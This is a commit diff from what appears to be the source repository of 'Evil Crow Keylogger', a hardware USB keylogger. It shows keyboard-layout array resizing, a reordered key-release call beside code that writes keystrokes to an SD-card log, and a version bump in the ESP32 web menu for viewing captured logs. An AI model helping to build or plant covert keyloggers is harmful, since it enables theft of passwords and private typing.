🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    code/ATMEGA32U4/ATMEGA32U4.ino
    skipped 14 lines
    15 15  #define SHIFT (0x80)
    16 16  #define ALTGR (0x40)
    17 17   
    18  -extern const uint8_t _asciimap[256] PROGMEM;
     18 +extern const uint8_t _asciimap[] PROGMEM;
    19 19   
    20 20  //modifiers
    21 21  int leftctrl_status=0;
    skipped 40 lines
    62 62  };
    63 63   
    64 64  void KbdRptParser::OnKeyUp(uint8_t mod, uint8_t key) {
    65  - Keyboard.rawrelease(key, 0);
    66 65   SetModifiersArd();
    67 66   key_modifier = key|modifiersard,HEX;
     67 + Keyboard.rawrelease(key, 0);
    68 68   SDlog = SD.open("log.txt", FILE_WRITE);
    69 69   
    70 70   for (int i = 0; i < 256; i++) {
    skipped 72 lines
  • ■ ■ ■ ■
    code/ESP32/ESP32.ino
    skipped 12 lines
    13 13   
    14 14  // HTML and CSS style
    15 15  const String HTML_CSS_STYLING = "<html><head><meta charset=\"utf-8\"><title>Evil Crow Keylogger</title><style> body { background-color: #333333; font-family: \"Century Gothic\", Arial; color: white; margin: 20px;}.myButton:link, .myButton:visited {background: linear-gradient(#777777, #444444);color: white;padding: 4px;min-width: 100px;border-radius: 5px;border: 2px solid white;text-align: center;margin-right: 20px;text-decoration: none;display: inline-block;transition: 0.25s;} .myButton:hover, .myButton:active {background: linear-gradient(#888888, #555555);border: 2px solid deepskyblue;border-radius: 10px;transform: scale(1.15);}</style></head>";
    16  -const String MENU = "<body><p>Evil Crow Keylogger v1.1</p><div id=\"header\"><div id=\"menu\"><ul><a class=\"myButton\" href=\"/viewlog\">View Log</a><a class=\"myButton\" href=\"/delete\">Delete log</a></ul></div></div></style>";
     16 +const String MENU = "<body><p>Evil Crow Keylogger v1.2</p><div id=\"header\"><div id=\"menu\"><ul><a class=\"myButton\" href=\"/viewlog\">View Log</a><a class=\"myButton\" href=\"/delete\">Delete log</a></ul></div></div></style>";
    17 17   
    18 18  // File
    19 19  File logs;
    skipped 51 lines
  • ■ ■ ■ ■ ■ ■
    libraries/Keyboard/src/be_be.h
    skipped 1 lines
    2 2  #define _kbd_lang
    3 3   
    4 4  extern
    5  -const uint8_t _asciimap[128] PROGMEM;
     5 +const uint8_t _asciimap[256] PROGMEM;
    6 6   
    7 7  #define SHIFT 0x80
    8  -const uint8_t _asciimap[128] =
     8 +const uint8_t _asciimap[256] =
    9 9  {
    10 10   0x00, // NUL
    11 11   0x00, // SOH
    skipped 129 lines
  • ■ ■ ■ ■ ■ ■
    libraries/Keyboard/src/cz_cz.h
    skipped 1 lines
    2 2  #define _kbd_lang
    3 3   
    4 4  extern
    5  -const uint8_t _asciimap[128] PROGMEM;
     5 +const uint8_t _asciimap[256] PROGMEM;
    6 6   
    7 7  #define SHIFT 0x80
    8  -const uint8_t _asciimap[128] =
     8 +const uint8_t _asciimap[256] =
    9 9  {
    10 10   0x00, // NUL
    11 11   0x00, // SOH
    skipped 130 lines
  • ■ ■ ■ ■ ■ ■
    libraries/Keyboard/src/da_dk.h
    skipped 1 lines
    2 2  #define _kbd_lang
    3 3   
    4 4  extern
    5  -const uint8_t _asciimap[128] PROGMEM;
     5 +const uint8_t _asciimap[256] PROGMEM;
    6 6   
    7 7  #define SHIFT 0x80
    8  -const uint8_t _asciimap[128] =
     8 +const uint8_t _asciimap[256] =
    9 9  {
    10 10   0x00, // NUL
    11 11   0x00, // SOH
    skipped 130 lines
  • ■ ■ ■ ■ ■ ■
    libraries/Keyboard/src/de_de.h
    skipped 1 lines
    2 2  #define _kbd_lang
    3 3   
    4 4  extern
    5  -const uint8_t _asciimap[128] PROGMEM;
     5 +const uint8_t _asciimap[256] PROGMEM;
    6 6   
    7 7  #define SHIFT 0x80
    8  -const uint8_t _asciimap[128] =
     8 +const uint8_t _asciimap[256] =
    9 9  {
    10 10   0x00, // NUL 0
    11 11   0x00, // SOH
    skipped 130 lines
  • ■ ■ ■ ■ ■ ■
    libraries/Keyboard/src/en_us.h
    skipped 1 lines
    2 2  #define _kbd_lang
    3 3   
    4 4  extern
    5  -const uint8_t _asciimap[128] PROGMEM;
     5 +const uint8_t _asciimap[256] PROGMEM;
    6 6   
    7 7  #define SHIFT 0x80
    8  -const uint8_t _asciimap[128] =
     8 +const uint8_t _asciimap[256] =
    9 9  {
    10 10   0x00, // NUL
    11 11   0x00, // SOH
    skipped 130 lines
  • ■ ■ ■ ■ ■ ■
    libraries/Keyboard/src/fi_fi.h
    skipped 1 lines
    2 2  #define _kbd_lang
    3 3   
    4 4  extern
    5  -const uint8_t _asciimap[128] PROGMEM;
     5 +const uint8_t _asciimap[256] PROGMEM;
    6 6   
    7 7  #define SHIFT 0x80
    8  -const uint8_t _asciimap[128] =
     8 +const uint8_t _asciimap[256] =
    9 9  {
    10 10   0x00, // NUL
    11 11   0x00, // SOH
    skipped 130 lines
  • ■ ■ ■ ■ ■ ■
    libraries/Keyboard/src/fr_fr.h
    skipped 1 lines
    2 2  #define _kbd_lang
    3 3   
    4 4  extern
    5  -const uint8_t _asciimap[128] PROGMEM;
     5 +const uint8_t _asciimap[256] PROGMEM;
    6 6   
    7 7  #define SHIFT 0x80
    8  -const uint8_t _asciimap[128] =
     8 +const uint8_t _asciimap[256] =
    9 9  {
    10 10   0x00, // NUL
    11 11   0x00, // SOH
    skipped 130 lines
  • ■ ■ ■ ■ ■ ■
    libraries/Keyboard/src/it_it.h
    skipped 1 lines
    2 2  #define _kbd_lang
    3 3   
    4 4  extern
    5  -const uint8_t _asciimap[128] PROGMEM;
     5 +const uint8_t _asciimap[256] PROGMEM;
    6 6   
    7 7  #define SHIFT 0x80
    8  -const uint8_t _asciimap[128] =
     8 +const uint8_t _asciimap[256] =
    9 9  {
    10 10   0x00, // NUL
    11 11   0x00, // SOH
    skipped 130 lines
  • ■ ■ ■ ■ ■ ■
    libraries/Keyboard/src/pt_pt.h
    skipped 1 lines
    2 2  #define _kbd_lang
    3 3   
    4 4  extern
    5  -const uint8_t _asciimap[128] PROGMEM;
     5 +const uint8_t _asciimap[256] PROGMEM;
    6 6   
    7 7  #define SHIFT 0x80
    8  -const uint8_t _asciimap[128] =
     8 +const uint8_t _asciimap[256] =
    9 9  {
    10 10   0x00, // NUL
    11 11   0x00, // SOH
    skipped 129 lines
  • ■ ■ ■ ■ ■ ■
    libraries/Keyboard/src/tr_tr.h
    skipped 1 lines
    2 2  #define _kbd_lang
    3 3   
    4 4  extern
    5  -const uint8_t _asciimap[128] PROGMEM;
     5 +const uint8_t _asciimap[256] PROGMEM;
    6 6   
    7 7  #define SHIFT 0x80
    8  -const uint8_t _asciimap[128] =
     8 +const uint8_t _asciimap[256] =
    9 9  {
    10 10   0x00, // NUL
    11 11   0x00, // SOH
    skipped 130 lines
Please wait...
Page is in error, reload to recover